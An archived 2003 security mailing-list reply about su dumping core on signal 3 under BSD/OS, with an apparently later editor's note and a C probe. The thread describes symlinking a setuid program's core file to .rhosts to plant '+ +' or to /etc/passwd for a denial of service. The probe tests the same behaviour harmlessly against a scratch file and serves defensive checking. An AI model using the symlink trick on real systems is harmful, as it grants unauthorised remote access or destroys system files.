Re: su core dumped with signal 3. BSD/OS 3.0, 3.1

From: Joel Eriksson (je-vulndevat_private)
Date: Thu Mar 13 2003 - 09:52:11 PST


    On Wed, Mar 12, 2003 at 09:26:22PM +0100, Marco Ivaldi wrote:
    > > As to exploiting, no, I don't think you can exploit this: the core here
    > > is a result of the kernel processing a signal sent to the process, not
    > > of some overflow or invalid memory access or similar.
    > 
    > Just wondering. What happens if you create a symlink to .rhosts and manage
    > to write a "+ +" in memory before coredump (I've not checked if it's
    > possible in this particular situation)? Or maybe symlinking /etc/passwd
    > and causing a DoS condition? This is just an example, but I'm not so sure
    > it's not possible to exploit this behaviour of a setuid program...
    > 
    > Please correct me if i'm plain wrong:)
    
    This used to work a few years ago anyway. I would think recent versions
    of Unix OSes have fixed that rather trivial flaw, but it's worth trying.
    
    > :raptor
    > Antifork Research, Inc.                         0xdeadbeef | raptor's labs
    > http://www.antifork.org                         http://www.0xdeadbeef.info
    
    -- 
    Joel Eriksson
    -------------------------------------------------
    Security Research & Systems Development at Bitnux
    PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1
    A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1
    -------------------------------------------------
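[Editor's note, not part of the thread.] The trick Marco sketches and Joel says "used to work" is the classic setuid core-dump symlink attack: if the kernel writes the core image to whatever "core" resolves to in the dying process's working directory, and the process still has "+ +" in memory, the victim's ~/.rhosts ends up containing a line that trusts every host. The probe below is an added example written for this page, not code from either poster; it reproduces the setup with an unprivileged child standing in for su and a scratch "victim" file standing in for .rhosts, kills the child with signal 3 (SIGQUIT, as in the report), and then checks whether the victim was touched. It assumes a POSIX system with fork(), mkdtemp() and a writable /tmp, and the file names and the 16-byte payload buffer are my choices. On Linux the expected result is "victim intact": the kernel opens the core file with O_NOFOLLOW, rejects targets with more than one hard link or owned by someone else, and a setuid process is not dumpable at all unless fs.suid_dumpable is changed, so this probe tests only the symlink handling and not that extra suid layer. No claim is made here about what BSD/OS 3.x actually did.

```c
/* Added probe for the "symlink core to .rhosts" trick discussed in the thread;
 * not code from the original posts. Assumes (my choice, not the page's) a POSIX
 * system with fork(), mkdtemp() and a writable /tmp. "victim" stands in for
 * ~/.rhosts, the unprivileged child for the setuid program. */
#define _DEFAULT_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <limits.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>

/* Bytes the attacker wants inside the core image: "+ +" trusts every host. */
static volatile char rhosts_payload[16] = "+ +\n";
/* Known victim contents, so any overwrite is detectable afterwards. */
static const char victim_contents[] = "original victim contents\n";

/* 1 if the victim still holds victim_contents, 0 if it changed, -1 on error. */
static int victim_intact(const char *path)
{
    char buf[64] = { 0 };
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    ssize_t n = fd < 0 ? -1 : read(fd, buf, sizeof buf - 1);
    if (fd >= 0) close(fd);
    return n < 0 ? -1 : strcmp(buf, victim_contents) == 0;
}

/* Remove the scratch directory and anything the kernel dumped into it. */
static void cleanup(const char *dir)
{
    char p[PATH_MAX];
    struct dirent *e;
    DIR *d = opendir(dir);
    while (d && (e = readdir(d)) != NULL)
        if (e->d_name[0] != '.' && snprintf(p, sizeof p, "%s/%s", dir, e->d_name) > 0)
            unlink(p);
    if (d) closedir(d);
    rmdir(dir);
}

/* Returns 1 if the victim survived (symlink refused, core written elsewhere, or
 * no core at all), 0 if it was overwritten, -1 on setup failure. If dumped is
 * non-NULL it gets WCOREDUMP() of the child: "refused" vs "dumps disabled". */
int core_symlink_probe(int *dumped)
{
    char dir[] = "/tmp/coredemo.XXXXXX", victim[PATH_MAX], corelink[PATH_MAX];
    int fd, status, result = -1;
    if (dumped) *dumped = 0;
    if (!mkdtemp(dir))
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(corelink, sizeof corelink, "%s/core", dir);
    fd = open(victim, O_WRONLY | O_CREAT | O_TRUNC, 0600);
    if (fd < 0 || write(fd, victim_contents, strlen(victim_contents)) < 0 ||
        close(fd) != 0 || symlink("victim", corelink) != 0) {
        cleanup(dir);
        return -1;
    }
    pid_t pid = fork();
    if (pid == 0) {
        /* Child: raise soft core limit to the hard limit, make SIGQUIT
         * deliverable, die in the directory whose "core" entry is the symlink. */
        struct rlimit rl; sigset_t set;
        if (getrlimit(RLIMIT_CORE, &rl) == 0) {
            rl.rlim_cur = rl.rlim_max;
            setrlimit(RLIMIT_CORE, &rl);
        }
        sigemptyset(&set);
        sigaddset(&set, SIGQUIT);
        sigprocmask(SIG_UNBLOCK, &set, NULL);
        signal(SIGQUIT, SIG_DFL);
        if (chdir(dir) != 0)
            _exit(2);
        rhosts_payload[0] = '+';   /* keep the payload live in the image */
        raise(SIGQUIT);            /* signal 3, as in the original report */
        _exit(3);
    }
    if (pid > 0 && waitpid(pid, &status, 0) == pid && WIFSIGNALED(status)) {
        if (dumped) *dumped = WCOREDUMP(status) ? 1 : 0;
        result = victim_intact(victim);
    }
    cleanup(dir);
    return result;
}

int main(void)
{
    int dumped, r = core_symlink_probe(&dumped);
    if (r < 0)
        puts("probe setup failed");
    else
        printf("child %s a core; victim file %s\n",
               dumped ? "dumped" : "did not dump", r ? "intact" : "OVERWRITTEN");
    return r == 1 ? 0 : 1;
}
```

Run it with the core hard limit raised (ulimit -Hc unlimited) so that "did not dump" really means the kernel refused the symlinked target rather than that core dumps were simply disabled; "dumped a core" together with "victim intact" means the core went elsewhere (for example to a core_pattern path or a pipe handler). The exit status is 0 only when the victim file was left alone, which is what you would expect from any kernel that has fixed the flaw Joel refers to.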
    



    This archive was generated by hypermail 2b30 : Thu Mar 13 2003 - 12:37:35 PST